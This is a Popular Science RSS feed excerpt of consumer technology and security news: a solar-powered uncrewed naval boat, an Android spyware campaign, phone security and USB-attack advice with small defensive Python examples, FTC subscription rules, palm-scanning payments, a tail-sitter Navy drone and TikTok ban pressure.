The boat is made from aluminum and has a compact, light body. (See it on Instagram here.) Just 28.5 feet long and under 8 feet wide, the boat is powered by a 50 hp electric motor; its power is sustained in part by solar panels mounted on the top of the deck. Those solar panels can provide up to 1.1 kilowatts at peak power, which is enough to sustain its autonomous operation for just shy of an hour.

The vessel was made by Atomo Tech and Colombia’s state-owned naval enterprise company, COTECMAR. The company says the boat’s lightweight form allows it to take on different payloads, making it suitable for “intelligence and reconnaissance missions, port surveillance and control missions, support in communications link missions, among others.”

Putting sensors on small, autonomous and electric vessels is a recurring theme in navies that employ drone boats. Even a part of the ocean that seems small, like a harbor, represents a big job to watch. By putting sensors and communications links onto an uncrewed vessel, a navy can effectively extend the range of what can be seen by human operators. 

In January, the US Navy used Saildrones for this kind of work in the Persian Gulf. Equipped with cameras and processing power, the Saildrones identified and tracked ships in an exercise as they spotted them, making that information available to human operators on crewed vessels and ultimately useful to naval commanders. 

Another reason to turn to uncrewed vessels for this work is that they are easier to run on fully electric power, as opposed to diesel or gasoline. COTECMAR’s video description notes that the COTEnergy Boat is being “incorporated into the offer of sustainable technological solutions that we are designing for the energy transition.” Making patrol craft solar-powered and electric means the vessels start out sustainable.

While developed as a military tool, the COTEnergy Boat could also have a role in scientific and research expeditions. It could serve as a communications link between other ships, or between ships and other uncrewed vessels, ensuring reliable operation and data collection. Adding sensors designed to look under the water’s surface could aid with oceanic mapping and observation. As a platform for sensors, the COTEnergy Boat is limited by what its adaptable frame can carry and power, although its load capacity is 880 pounds.

Not much more is known about the COTEnergy Boat at this point. But what is compelling about the vessel is how it fits into the similar plans of other navies. Fielding small, useful autonomous scouts or patrol craft, if successful, could become a routine part of naval and coastal operations.

With these new kinds of boats come new challenges. Because uncrewed ships lack crews, they can be easier targets for other navies or possibly maritime criminal groups, like pirates. The same kind of Saildrones used by the US Navy to scout the Persian Gulf have been detained, if briefly, by the Iranian Navy. With such detentions comes the risk that data on the ship is compromised and its data collection tools are figured out, making it easier for hostile forces to fool or evade the sensors in the future.

Still, the benefits of having a flexible, solar-powered robot ship outweigh such risks. Inspection of ports is routine until it isn’t, and with a robotic vessel there to scout first, humans can wait to act until they are needed, safely removed from their remote robotic companions.

Watch a little video of the COTEnergy Boat below:


]]>
What to know about a ‘sophisticated hacking campaign’ against Android phones https://www.popsci.com/technology/android-phones-hacking-amnesty-international-security-lab/ Thu, 30 Mar 2023 18:30:00 +0000 https://www.popsci.com/?p=524254
Security photo

The vulnerabilities were recently announced by Amnesty International’s Security Lab.

The post What to know about a ‘sophisticated hacking campaign’ against Android phones appeared first on Popular Science.

]]>

Amnesty International revealed this week that its Security Lab has uncovered a “sophisticated hacking campaign by a mercenary spyware company.” They say it has been running “since at least 2020” and takes aim at Android smartphones using a number of “zero-day” security vulnerabilities. (A “zero-day” vulnerability is a flaw that is previously undiscovered and therefore unpatched.) 

Amnesty International disclosed the details of the campaign to Google’s Threat Analysis Group, so it—as well as other affected companies, including Samsung—have since been able to release the necessary security patches for their devices. 

Amnesty International’s Security Lab is responsible for monitoring and investigating companies and governments that employ cyber-surveillance technologies to threaten human rights defenders, journalists, and civil society. It was instrumental in uncovering the extent to which NSO Group’s Pegasus spyware was used by governments around the world. 

While the Security Lab continues to investigate this latest spyware campaign, Amnesty International is not revealing the company it has implicated (though Google suggests it’s Variston, a group it discovered in 2022). Either way, Amnesty International claims that the attack has “all the hallmarks of an advanced spyware campaign developed by a commercial cyber-surveillance company and sold to government hackers to carry out targeted spyware attacks.”

As part of the spyware campaign, Google’s Threat Analysis Group discovered that Samsung users in the United Arab Emirates were being targeted with one-time links sent over SMS. If they opened the link in the default Samsung Internet Browser, a “fully featured Android spyware suite” that was capable of decrypting and capturing data from various chat services and browser applications would get installed on their phone. 

The exploit relied on a chain of multiple zero-day and discovered but unpatched vulnerabilities, which reflects badly on Samsung. A fix was released for one of the unpatched vulnerabilities in January 2022 and for the other in August 2022. Google contends that if Samsung had released the security updates, “the attackers would have needed additional vulnerabilities to bypass the mitigations.” (Samsung released the fixes in December 2022.)

With that said, one of the zero-day vulnerabilities would also allow hackers to attack Linux desktop and embedded systems, and Amnesty International suggests that other mobile and desktop devices have been targeted as part of the spyware campaign, which has been ongoing since at least 2020. The human rights group also notes that the spyware was delivered from “an extensive network of more than 1000 malicious domains, including domains spoofing media websites in multiple countries,” which lends credence to its claims that a commercial spyware group is behind it.

Although it is not yet clear who the targets of this attack were, according to Amnesty International, “human rights defenders in the UAE have long been victimized by spyware tools from cyber-surveillance companies.” For example, Ahmed Mansoor was targeted by spyware from the NSO Group and jailed as a result of his human rights work.

In addition to the UAE, Amnesty International’s Security Lab found evidence of the spyware campaign in Indonesia, Belarus, and Italy, though it concludes that “these countries likely represent only a small subset of the overall attack campaign based on the extensive nature of the wider attack infrastructure.”

“Unscrupulous spyware companies pose a real danger to the privacy and security of everyone. We urge people to ensure they have the latest security updates on their devices,” says Donncha Ó Cearbhaill, head of Security Lab, in the statement on Amnesty International’s website. “While it is vital such vulnerabilities are fixed, this is merely a sticking plaster to a global spyware crisis. We urgently need a global moratorium on the sale, transfer, and use of spyware until robust human rights regulatory safeguards are in place, otherwise sophisticated cyber-attacks will continue to be used as a tool of repression against activists and journalists.”

At least in the United States, the government seems to agree. President Biden signed an executive order on March 27 blocking federal agencies from using spyware “that poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person.”

The post What to know about a ‘sophisticated hacking campaign’ against Android phones appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

Your checklist for maximum smartphone security https://www.popsci.com/story/diy/phone-security-protect-accounts/ Thu, 21 Jan 2021 13:00:00 +0000 https://stg.popsci.com/uncategorized/phone-security-protect-accounts/
It's easy to take back control of your data with this smartphone security checklist.
Use this security checklist to make sure you're the only person accessing the data on your phone. Priscilla Du Preez/Unsplash

If you think someone might've been snooping on your phone, this is how to take back your privacy.

The post Your checklist for maximum smartphone security appeared first on Popular Science.

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Everyone wants the data on their phone to stay private, and Android and iOS come with a variety of security features that will prevent other people from sneaking a peek.

If you suspect someone is snooping on you, there are some simple steps you can follow to secure your information, as well as a few warning signs to look out for to make sure it doesn’t happen in the future.

How to keep your lock screen secure

Whether you use a PIN code or a biometric feature (like your face or fingerprint), your phone’s lock screen is the first barrier against unauthorized access.

You can customize lock screen security on Android by going to Settings, Security & privacy, Device lock, and then Screen lock. Meanwhile, from the Settings app on iOS, choose either Touch ID & Passcode or Face ID & Passcode, depending on which biometric security method is built into your iPhone.

[Related: 7 secure messaging apps you should be using]

You should also make sure the screen on your device locks as soon as possible after you’ve stopped using it—otherwise, someone could surreptitiously swipe it while you’re not looking before the locking mechanism kicks in. On Android, open Settings, then go to Display and Screen timeout to set how quickly the screen should turn off—your options go from 15 seconds to 30 minutes. Over in iOS settings, pick Display & Brightness, then Auto-Lock. The shorter the time period you set here, the more secure your data is.

If you need to lend your phone to someone, but still worry about their unfettered access to your handset, know that you can lock people inside one particular app or prevent them from installing anything while you’re not looking. We’ve gone deeper into these features and other similar security options, for both Android and iOS.

How to avoid spyware on your phone

Thanks to the security protocols in place on Android and iOS, it’s actually quite difficult for spying software to get on your phone without your knowledge. To succeed, someone would need to physically access your phone and install a monitoring app, or trick you into clicking on a link, opening a dodgy email attachment, or downloading something from outside your operating system’s official app store. You should see a warning if you do any of these things by mistake, but because it’s easy to disregard those notifications, you should always be careful what you click on.

Android and iOS don’t allow apps to hide, so even if someone has gained access to your handset to install an app that’s keeping tabs on you, you’ll be able to see it. On Android, go to Settings, Apps, and then See all apps. If you see something you don’t recognize, tap the item on the list and choose Uninstall. Within iOS, just check the main apps list in Settings. As the device’s owner, you can uninstall anything you don’t recognize or trust—you won’t break your phone by removing apps, so don’t hesitate if there’s something you’re unsure about.

If you want to do a bit more detective work, you can check the permissions of any suspicious apps. These will show up when you tap through on the apps list from the screens just mentioned—on Android, tap on an app and go to Permissions; on iOS tap an app name from the main Settings page and check what it’s allowed to access. In terms of notifications, system settings, device monitoring, and other special permissions, Android gives apps slightly more leeway than iOS—you can check up on these by going to Settings and choosing Apps and Special app access.

If you think your phone might have been compromised in some way, make sure you back up all of your data and perform a full reset. This should remove shady apps, block unauthorized access, and put you back in control. From Android’s settings page, choose System, Reset options, and Erase all data (factory reset). On iOS, open Settings, then pick General, Transfer or Reset iPhone, and Reset.

Watch what you’re sharing

Apple and Google make it easy for you to share your location, photos, and calendars with other people. But this sort of sharing might have been enabled without your knowledge, or you may have switched it on in the past and now want to deactivate it.

If you’re on an iPhone, open the Settings app, tap your Apple ID or name at the top of the screen, open Find My, and see who can view your location at all times. You can revoke access for everyone by turning off the toggle switch next to Share My Location or remove individuals by touching their name followed by Stop Sharing My Location. You can audit shared photo albums from the Shared Albums section of the Albums tab in Photos, and shared calendars from the Calendars screen in the Calendar app. If you’re in a Family Sharing group that you no longer want to be a part of, open Settings, tap your Apple ID or name, and choose Leave Family.

[Related: How to securely store and share sensitive files]

Android handles location sharing with other people through Google Maps. Tap your avatar (top right), then Location sharing to check who can see your location and to stop them, if necessary. You can check your shared photo albums in Google Photos by tapping the Sharing tab at the bottom of the screen, but you’ll need to open up Google Calendar on the web to edit shared calendars. Hover over the name of a calendar on the left sidebar and click the three dots that appear, and on the emerging menu, select Settings and sharing to see who can view your schedule.

Google Families works in a similar way to Apple Family Sharing, with certain notes and calendars marked as accessible by everyone, though no one will be able to see any personal files unless the owner specifically shares them. If you want to leave a family group, open the Play Store app on Android, and tap your avatar (top left). Once you’re there, go to Settings, Family, and Manage family members. Then, in the top right, tap the three dots and Leave family group.

Protect your accounts

With so much of our digital lives now stored in the cloud, hacking these services is arguably an easier route into your data than physically accessing your phone. If your Apple or Google account gets compromised, your emails, photos, notes, calendars, and messages could all be vulnerable, and you wouldn’t necessarily know it.

The usual password rules apply: Don’t repeat credentials across multiple accounts and make sure they’re easy for you to remember while remaining impossible for anyone else to guess. This includes even those closest to you, so avoid names, birthdays, and pet names.

Two-factor authentication (2FA) is available on most digital accounts, so switch it on wherever you can. For Apple accounts, visit this page and click Account Security; for Google accounts, click your avatar on any of the company’s services, go to Manage account, Security, and click on 2-Step Verification.
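Curious what those six-digit codes actually are? Authenticator apps typically generate them with the time-based one-time password (TOTP) algorithm standardized in RFC 6238. Here’s a minimal sketch in Python using only the standard library (the `totp` helper name is ours; real apps add secret provisioning and clock-drift handling on top of this):

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, at_time: int, digits: int = 6, step: int = 30) -> str:
    """Time-based one-time password (RFC 6238), built on HOTP (RFC 4226)."""
    counter = at_time // step                  # the code changes every `step` seconds
    msg = struct.pack(">Q", counter)           # counter as an 8-byte big-endian value
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                    # "dynamic truncation" picks 4 bytes
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890" at t=59 seconds
print(totp(b"12345678901234567890", 59, digits=8))  # -> 94287082
```

Because the code is derived from the current 30-second window, a stolen code goes stale almost immediately, which is exactly what makes 2FA a meaningful second barrier even if your password leaks.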

It’s a good idea to regularly check how many devices are logging in using your Google or Apple account credentials as well. On Android, open Settings and pick Google, Manage your Google account, and Security. Scroll down and under Your devices you’ll see a list of all the gadgets linked to your Google account. You can remove any of them by tapping on their name, followed by Sign out. On an iPhone, open Settings and tap your name at the top to see devices linked to your account—you can tap on one and then choose Remove from Account to revoke its access to your Apple account.

As long as you have 2FA set up, any unwelcome visitor should be blocked from signing straight back into your account, even if they know your password. But to be safe, if you discover some sort of unauthorized access, we’d still recommend changing your password. It’s also a good idea to do this regularly to make sure that only your devices have access to your data.

This story has been updated. It was originally published on January 21, 2021.

Maritime students gear up to fight high-seas cyberattacks https://www.popsci.com/technology/maritime-cybersecurity-college-class/ Sat, 25 Mar 2023 11:00:00 +0000 https://www.popsci.com/?p=522856
Container cargo ship at sea
Maritime cybersecurity is vital for global trade, but until now, there were no dedicated training programs. Deposit Photos

A Norwegian university is tackling the lack of boat cybersecurity with a new college class.

The post Maritime students gear up to fight high-seas cyberattacks appeared first on Popular Science.

The word “pirate” may conjure up the image of humans physically taking over a vessel, but what if instead a ship was simply hacked from afar? That’s a question on the mind of Norwegian researchers, who point out that unfortunately, the international shipping world isn’t exactly known for its quick adoption of cutting-edge tech.

“The maritime industry has a history of being quite reactive and slow, so it is no surprise that we are lacking behind in the matter of cybersecurity as well,” says Marie Haugli-Sandvik.

Haugli-Sandvik, who works within the Department of Ocean Operations and Civil Engineering at Norwegian University of Science and Technology (NTNU), explains via email to PopSci that this incremental pace is what led her and fellow PhD candidate, Erlend Erstad, to create what is likely the world’s first “maritime digital security” course. According to a report this week from NTNU, the course’s students recently spent two months examining and assessing current oceanic digital threats, then practiced handling a ship cyberattack scenario focusing on risk management and resilience building.

“We see that shipping companies are investing in technological solutions for increased automation and monitoring, which exposes vessels to cyber risks in new ways,” writes Haugli-Sandvik, noting the dramatic increase in maritime cyberattacks over the last few years, particularly in the wake of the COVID-19 pandemic. “These cyber threats can both bankrupt companies and affect the safety at sea,” she says.

[Related: ​The ship blocking the Suez is finally unstuck, but we could see bottlenecks like this again]

NTNU estimates 90 percent of all world trade is linked in some way to maritime travel, leaving a massive avenue for cyberthreats to disrupt global commerce, data, and safety. Unfortunately, many cybersecurity courses only focus on more generic IT threats, which is what spurred Haugli-Sandvik and Erstad to create the class.

Haugli-Sandvik says there is positive movement within the community—such as mandatory cybersecurity requirements coming from the maritime industry regulators at International Association of Classification Societies (IACS) in 2024, alongside increased cybersecurity training for maritime personnel—but there remains a sizable lack of targeted training pertaining to sea environments. 

The course instructors hope their students learn just how vulnerable to cyberthreats vessel systems can be, and that they come away with actionable operative training to handle issues. “Seafarers need to enhance their cyber security awareness and skills so that they can protect themselves, the ship, the environment, and their companies,” writes Haugli-Sandvik, adding, “The human element in cyber security is vital to address since there is no longer a question about if you get hit by a cyber-attack, it is a question about when it will happen.”

Don’t plug in mysterious USB drives https://www.popsci.com/technology/usb-based-attacks/ Thu, 23 Mar 2023 21:00:00 +0000 https://www.popsci.com/?p=522447
a person plugs in a usb drive
Only do this with devices you trust. Deposit Photos

From malware to more extreme scenarios, there are very important reasons to be wary of an unknown USB device.

The post Don’t plug in mysterious USB drives appeared first on Popular Science.

An Ecuadorian journalist has been injured by a bomb hidden inside a USB drive, according to AFP. Lenin Artieda, a television journalist, received an envelope containing what “looked like a USB drive,” the BBC reported. When he loaded it into his computer, it exploded. Fortunately, Artieda only sustained “slight injuries,” AFP reports, and no one else was hurt in the targeting campaign, which included “at least five journalists.” 

While this is an incredibly extreme example, it is an important reminder to never insert strange USB devices—and especially USB pen or thumb drives—into your computer. The most commonplace threat they pose is that they could come packed with malware. These are known as USB attacks, and they rely on the victim willingly inserting a USB device into their computer. In some cases, victims are simply being Good Samaritans, trying to return a USB drive to someone who’s lost it. In others, they’re lied to and told the USB drive contains a list of things they can spend a gift card on, or even confidential or important information.

However it happens, once the target inserts the USB device, the hackers and other bad actors have gotten what they want. USB devices provide them with multiple ways to ruin your day. In fact, researchers at Ben-Gurion University of the Negev in Israel have identified four broad categories of attack.

Type A attacks are where one USB device, like a thumb drive, impersonates another, like a keyboard. When you plug it in, the keyboard automatically sends keystrokes that can install malware, take over your system, and basically do whatever the attacker wants. It’s called a Rubber Ducky attack, which is a pretty cute term for something that can cause a lot of problems. 
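One common defense against this class of attack comes down to timing: injected keystrokes arrive far faster than any human could type, an idea used by open-source tools such as Google’s USB Keystroke Injection Protection. Here’s a simplified, illustrative Python sketch of that heuristic (the function name and thresholds are our own, not taken from any particular tool):

```python
def looks_like_injection(timestamps, max_gap_s=0.03, window=8):
    """Return True if any `window` consecutive keystrokes all arrive
    within `max_gap_s` seconds of each other -- implausibly fast for a human."""
    for i in range(len(timestamps) - window + 1):
        burst = timestamps[i:i + window]
        gaps = [b - a for a, b in zip(burst, burst[1:])]
        if max(gaps) < max_gap_s:
            return True
    return False

# A Rubber Ducky types at machine speed; a person doesn't.
injected = [i * 0.005 for i in range(20)]  # 5 ms between keystrokes
human = [i * 0.15 for i in range(20)]      # ~150 ms between keystrokes
```

A real defense would sit at the operating-system input layer and quarantine the offending device, but the core signal is just this burst-speed check.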

Type B1 and B2 attacks are similar. Instead of impersonating a different USB device, the attacker either reprograms the USB drive’s firmware (B1) or exploits a software bug in how the computer’s operating system handles USB devices (B2) to do something malicious. Finally, type C attacks deliver a high-powered electrical charge that can destroy the computer. 

In any case, these attacks aren’t theoretical. Infected USB keys were used to take down Iranian nuclear centrifuges. They’ve also been used to infect US power plants and other infrastructure, like oil refineries. And it’s not just heavy industries that are affected—banks, hospitality providers, transport companies, insurance providers, and defense contractors have all been targeted over the past few years with USB drives sent through the mail.

While email is still the most common method of malware delivery and most attacks target large companies, small businesses and individual users should still be careful. Ransomware in particular is a very real threat at the moment.

So what do you do if you find a USB key abandoned on the ground? Well, your best bet is to pop it in the nearest trash can—or better yet, send it to an e-waste recycling center. Whatever you do, don’t plug it into your computer. 

If you receive a USB key in the mail, you should do much the same—unless you are expecting one from someone you trust. 

Even the free USB keys that companies give out at conferences likely should be treated the same way. It’s too easy for a bad actor to sneak in, pretend to be working for a firm at the show, and hand out loads of malware-infected devices. 

And if you do insist on plugging it in, check out our guide on how to do it as safely as possible. It can still be a risky gambit—and it doesn’t mitigate the risk from, in what’s certainly a very rare case, an explosive device—but at least the chance of your PC getting infected with malware will be reduced.

Canceling your digital subscriptions could finally get easier https://www.popsci.com/technology/ftc-subscription-cancellation/ Thu, 23 Mar 2023 17:00:00 +0000 https://www.popsci.com/?p=522310
Close-up of Federal Trade Commission building exterior
The FTC wants to put an end to subscription cancellation red-tape. Deposit Photos

The FTC wants to force companies to vastly simplify their membership and subscription cancellation steps.

The post Canceling your digital subscriptions could finally get easier appeared first on Popular Science.

How much money have you lost from forgetting to cancel an online subscription following its free trial? Or from getting frustrated while trying to figure out how exactly to end a recurring charge, pledging to do it later, and then subsequently not getting around to it? Don’t feel bad—the Federal Trade Commission sympathizes. And they are trying to do something to ease the pain.

On Thursday, the FTC announced a new “click to cancel” rule provision proposal to simplify the process of ending subscriptions and memberships for consumers. The potential reforms come as regulators are reexamining their 1973 Negative Option Rule, which is often utilized by the agency to push back against companies’ often deliberate tactics to obfuscate the ways in which customers can voluntarily end subscriptions.

[Related: The FTC is trying to get more tech-savvy.]

“Some businesses too often trick consumers into paying for subscriptions they no longer want or didn’t sign up for in the first place,” said FTC Chair Lina M. Khan in the official statement, adding that the new proposal will save consumers money and time while enabling regulators the ability to issue penalties to businesses for “subscription tricks and traps.”

Arguing the “current patchwork of laws and regulations available to the FTC do not provide consumers and industry with a consistent legal framework,” regulators are suggesting three major changes:

  • Requiring a simple mechanism making it as easy to cancel a service’s account as it is to sign up for one, and in “the same number of steps.”
  • While still allowing businesses to pitch additional offers or subscription modifications during the cancellation process, those opportunities can only be given after presenting users with a clear means to opt-out of paid memberships.
  • Requiring sellers to provide annual reminders to consumers enrolled in “negative option programs involving anything other than physical goods, before they are automatically renewed.”

Additionally, the FTC seeks to require companies offering customers online subscription sign-up options to also explicitly offer online cancellation, as opposed to only doing so through email forms, phone calls, or in-person meetings.

[Related: Why the new FTC chair is causing such a stir.]

As helpful as these changes will be for consumers, unfortunately, there is no current estimated timeline on when the reforms could go into effect. Multiple additional steps are needed, including a public comment period, before the FTC begins writing a final rule proposal. In the meantime, now is as good a time as ever to start reviewing what subscriptions—such as streaming services—are still charging to your bank accounts.

Soup with a side of biometrics: Amazon One is coming to Panera https://www.popsci.com/technology/panera-amazon-palm-scanner/ Wed, 22 Mar 2023 20:00:00 +0000 https://www.popsci.com/?p=522072
Panera Bread restaurant exterior at twilight
Amazon One integration is beginning at locations in St. Louis. Deposit Photos

Amazon was hit with a lawsuit regarding its use of the palm-scanning biometric tools just last week.

The post Soup with a side of biometrics: Amazon One is coming to Panera appeared first on Popular Science.

Panera announced a new partnership with Amazon to integrate the tech company’s Amazon One biometric palm scanning services into the fast casual restaurant’s loyalty rewards program. But less than a week ago, the bakery-cafe chain’s newest collaborator was hit with potential litigation regarding alleged digital privacy violations in its NYC brick-and-mortar Amazon Go stores.

After linking one’s MyPanera account to Amazon’s contactless, palm-scanning Amazon One software, customers reportedly will be able to pay for meals, receive menu recommendations based on preferences, and earn rewards points without any physical card requirements. While currently limited to a handful of locations in St. Louis, the popular bakery-cafe chain intends to expand the feature to additional US locations in the coming months.

Palm scanners were first utilized within Amazon Go stores following a public launch in 2018. The workerless convenience shops faced immediate scrutiny from critics for their perceived overreliance on invasive data tech, as well as their impact on human labor forces. In 2021, New York City passed a law requiring businesses that collect, store, or share “biometric identifiers” to alert customers to this fact via signs posted near store entrances. Earlier this month, however, the New York Times revealed many stores still failed to abide by this obligation, allegedly including at least one Amazon Go location. The lawsuit alleges that Amazon only began posting signage following the NYT’s report.

Filed last Thursday in US District Court for the Southern District of New York, the lawsuit claims Amazon Go amasses customers’ biometric data via Amazon One palm scanners alongside computer vision, deep learning algorithms, and sensor fusion to “measure the shape and size of each customer’s body to identify customers, track where they move in the stores, and determine what they have purchased.”

[Related: ChatGPT is quietly co-authoring books on Amazon.]

“We all have our own favorite bread recipes, but none of them use biometric data as an ingredient,” Albert Fox Cahn, executive director of the Surveillance Technology Oversight Project (STOP) and an attorney on the proposed lawsuit, said via email when asked about the timing of Amazon’s Panera partnership. Cahn believes it’s “absurd” that Panera would utilize the palm scanners so soon after Amazon was hit with litigation over the tech’s uses.

“I don’t understand why the company isn’t taking customer’s privacy and safety more seriously,” he added.

In an email to PopSci, a Panera spokesperson stressed that the company’s partnership is with Amazon One specifically, and not Amazon Go. “Amazon One is the entirely opt-in, palm-scanning device,” they clarified. They declined to comment on the lawsuit regarding Amazon’s data policies within its Amazon Go locations.

Watch this Navy drone take off and land on its tail like a rocket https://www.popsci.com/technology/tail-sitter-drone-aerovel-flexrotor/ Tue, 21 Mar 2023 22:00:00 +0000 https://www.popsci.com/?p=521729
An Aerovel Flexrotor drone takes off from the guided-missile destroyer USS Paul Hamilton in the Arabian Gulf on March 8, 2023.
An Aerovel Flexrotor drone takes off from the guided-missile destroyer USS Paul Hamilton in the Arabian Gulf on March 8, 2023. Elliot Schaudt / US Navy

Drones like these are called tail-sitters, and they have distinct advantages.

The post Watch this Navy drone take off and land on its tail like a rocket appeared first on Popular Science.

On March 8, in the ocean between Iran and the Arabian Peninsula, the US Navy tested out a new drone. Called the Aerovel Flexrotor, it rests on a splayed tail, and boasts a powerful rotor just below the neck of its bulbous front-facing camera pod. The tail-sitting drone needs very little deck space for takeoff or landing, and once in the sky, it pivots and flies like a typical fixed-wing plane. It joins a growing arsenal of tools that are especially useful in the confined launch zones of smaller ship decks or unimproved runways.

The March flights took place as part of the International Maritime Exercise 2023, billed as a multinational undertaking involving 7,000 people from across 50 nations. Activities in the exercise include working on following orders together, maritime patrol, countering naval mines, testing the integration of drones and artificial intelligence, and work related to global health. It is a hodgepodge of missions, capturing the multitude of tasks that navies can be called upon to perform.

This deployment is at least the second time the Flexrotor has been brought to the Persian Gulf by the US Navy. In December 2022, a Coast Guard ship operating as part of a Naval task force in the region launched a Flexrotor. This flight was part of an event called Digital Horizon, aimed at integrating drones and AI into Navy operations, and it included 10 systems not yet used in the region.

“The Flexrotor can support intelligence, surveillance and reconnaissance (ISR) missions day and night using a daylight or infrared camera to provide a real-time video feed,” read a 2022 release from US Central Command. The release continued: “In addition to providing ISR capability, UAVs like the Flexrotor enable Task Force 59 to enhance a resilient communications network used by unmanned systems to relay video footage, pictures and other data to command centers ashore and at sea.”

Putting drones on ships is hardly new. The ScanEagle, a scout drone used by the US Navy since 2005, can be launched from a rail and landed by net or skyhook. What sets the Flexrotor apart is not that it is a drone on a ship, but the fact that it requires a minimum of infrastructure to make it usable. This is because the drone is a tail-sitter.

What is a tail-sitter?

There are two basic ways to move a heavier-than-air vehicle from the ground to the sky: generate lift from spinning rotors, or generate lift from forward thrust and fixed wings. Helicopters have many advantages, needing only landing pads instead of runways, and they can easily hover in flight. But helicopters’ aerodynamics limit cruising and maximum speeds, even as advances continue to be made.

Fixed wings, in turn, need to build speed and lift off from runways, or find another way to get into the sky. For drones like the ScanEagle, this is done with a launch rail, though other methods have been explored.

Between helicopters and fixed-wing craft sit tiltrotors and jump-jets, where the direction of thrust (from either rotors/propellers or ducted jets) changes while the plane stays level in flight, allowing vertical landings and short takeoffs. This is part of what DARPA is exploring through the SPRINT program.

Tail-sitters, instead, involve the entire plane pivoting in flight. In effect, they look almost like a rocket upon launch, narrow bodies pointed to pierce the sky, before leveling out in flight and letting the efficiency of lift from fixed wings extend flight time and range. (Remember the space shuttle? It was positioned like a tail-sitter when it blasted off, but landed like an airplane, albeit without engines.) Early tail-sitters suffered because they had to accommodate a human pilot through all those transitions. Modern tail-sitter drones, like the Flexrotor or Australia’s STRIX, instead have human operators guiding the craft remotely from a control station. Another example is Bell’s APT 70.

The advantage to a tail-sitting drone is that it only needs a clearing or open deck space as large as its widest dimension. In the case of the Flexrotor, that means a rotor diameter of 7.2 feet, with at least one part of the launching surface wide enough for the drone’s nearly 10-foot wingspan. By contrast, the Seahawk helicopters used by the US Navy have a rotor diameter of over 53 feet. Ships that can already accommodate helicopters can likely easily add tail-sitter drones, and ships that couldn’t possibly fit a full-sized crewed helicopter might be able to take on and operate a drone scout.
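To put those rotor diameters in perspective, here’s a quick back-of-the-envelope comparison (figures are the ones quoted in this article; the squared-diameter ratio is a rough proxy for swept-area clearance, not an official spec):

```python
# Figures from this article; treat as rough, not official specs.
flexrotor_rotor_ft = 7.2   # Flexrotor rotor diameter
seahawk_rotor_ft = 53.0    # Seahawk rotor diameter ("over 53 feet")

# Swept area scales with the square of the diameter, so the deck
# clearance a Seahawk needs dwarfs what the tail-sitter requires.
footprint_ratio = (seahawk_rotor_ft / flexrotor_rotor_ft) ** 2
print(round(footprint_ratio))  # -> 54
```

Roughly a fifty-fold difference in swept area is why a ship too small for any crewed helicopter can still operate a drone scout.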

In use, the Flexrotor boasts a cruising speed of 53 mph, a top speed of 87 mph, and potentially more than 30 hours of continuous operation. After takeoff, the Flexrotor pivots to fixed-wing flight, and the splayed tail retracts into a normal tail shape, allowing the craft to operate like a regular fixed-wing plane in the sky. Long endurance drones like these allow crews to pilot them in shifts, reducing pilot fatigue without having to land the drone to switch operators. Aerovel claims that Flexrotors have a range of over 1,265 miles at cruising speeds. In the air, the drone can serve as a scout with daylight and infrared cameras, and it can also work as a communications relay node, especially valuable if fleets are dispersed and other communications are limited.

As the Navy looks to expand what it can see and respond to, adding scouts that can be stowed away and then launched from cleared deck space extends how far ships can perceive. By improving scouting on the ocean, the drones make the vastness of the sea a little more knowable.


The post Watch this Navy drone take off and land on its tail like a rocket appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
US government gives TikTok an ultimatum, warning of ban https://www.popsci.com/technology/tiktok-ultimatum-ban-us-uk/ Thu, 16 Mar 2023 18:00:00 +0000 https://www.popsci.com/?p=520246
Smartphone with TikTok brand logo resting on laptop laptop keyboard
TikTok's parent company, ByteDance, faces increasing pressure from the US and the UK to distance itself from China. Deposit Photos

The Biden administration warned TikTok's owners to sell their stakes, while the UK banned the app from government devices.

The post US government gives TikTok an ultimatum, warning of ban appeared first on Popular Science.

]]>

The heat is truly on for short video app TikTok in both the US and abroad following months of political posturing and threats. On Thursday, The Wall Street Journal first reported that the Biden administration has issued an unofficial ultimatum to the popular social media app’s Chinese owners—sell your stock shares, or face a wholesale app ban in the US. Meanwhile, the UK moved forward on Thursday with blacklisting TikTok from all government devices, citing security concerns.

The latest domestic pressures come after a consistent torrent of criticisms from US lawmakers against TikTok’s parent company, ByteDance. Among others, Sens. John Thune (R-SD) and Mark Warner (D-VA) allege that China-based owners ostensibly can’t be trusted with access to their millions of American users’ data. Although it is true both ByteDance’s owners and TikTok itself have been shown to engage in questionable and outright illegal practices in the past, critics of the ban say this is nothing but a deflection from the larger issues at hand—namely, consumers’ overall digital privacy safeguards across the entire spectrum of online life and social media platforms.

[Related: Why some US lawmakers want to ban TikTok.]

“If it weren’t so alarming, it would be hilarious that US policymakers are trying to ‘be tough on China’ by acting exactly like the Chinese government,” Evan Greer, director of the privacy advocacy group Fight for the Future, recently argued in a statement. “Banning an entire app used by millions of people, especially young people, LGBTQ folks, and people of color, is classic state-backed Internet censorship,” Greer added.

Greer and others concede that while TikTok may pose some security risks for users, so does virtually every other major social media platform collecting massive troves of data for targeted advertising, branding, and consumer profiles. Even if TikTok were banned, Greer says, ByteDance could hypothetically still access much of the same data by buying it from data brokers, given that there are few laws in place to protect American consumers from this kind of strategy. Earlier this month, David Greene, civil liberties director of the Electronic Frontier Foundation, told PopSci that American lawmakers “can’t just be responding to undifferentiated fear, or to uninvestigated or unproven concerns, or at the worst, xenophobia.”

[Related: Hackers could be selling your Twitter data for the lowball price of $2.]

Instead, anti-ban advocates continue to urge Congress to pass universal data protection legislation, much like what the European Union did back in 2018 with the General Data Protection Regulation (GDPR). This regulation, which has affected companies such as Google and Amazon, most recently cost Meta, Facebook’s parent company, $275 million over a massive 2021 data leak.

Meanwhile, actually enacting such a targeted ban on TikTok could prove difficult to enforce, says Greer. Last month, the American Civil Liberties Union released a letter urging politicians to reconsider their stance on the issue while warning that blacklisting the app could violate First Amendment rights.



]]>
Blink’s Smart Doorbell is just $35 on Amazon right now https://www.popsci.com/gear/blink-smart-doorbell-deal/ Thu, 16 Mar 2023 15:09:43 +0000 https://www.popsci.com/?p=520133
Blink Video Doorbell Deal
Blink

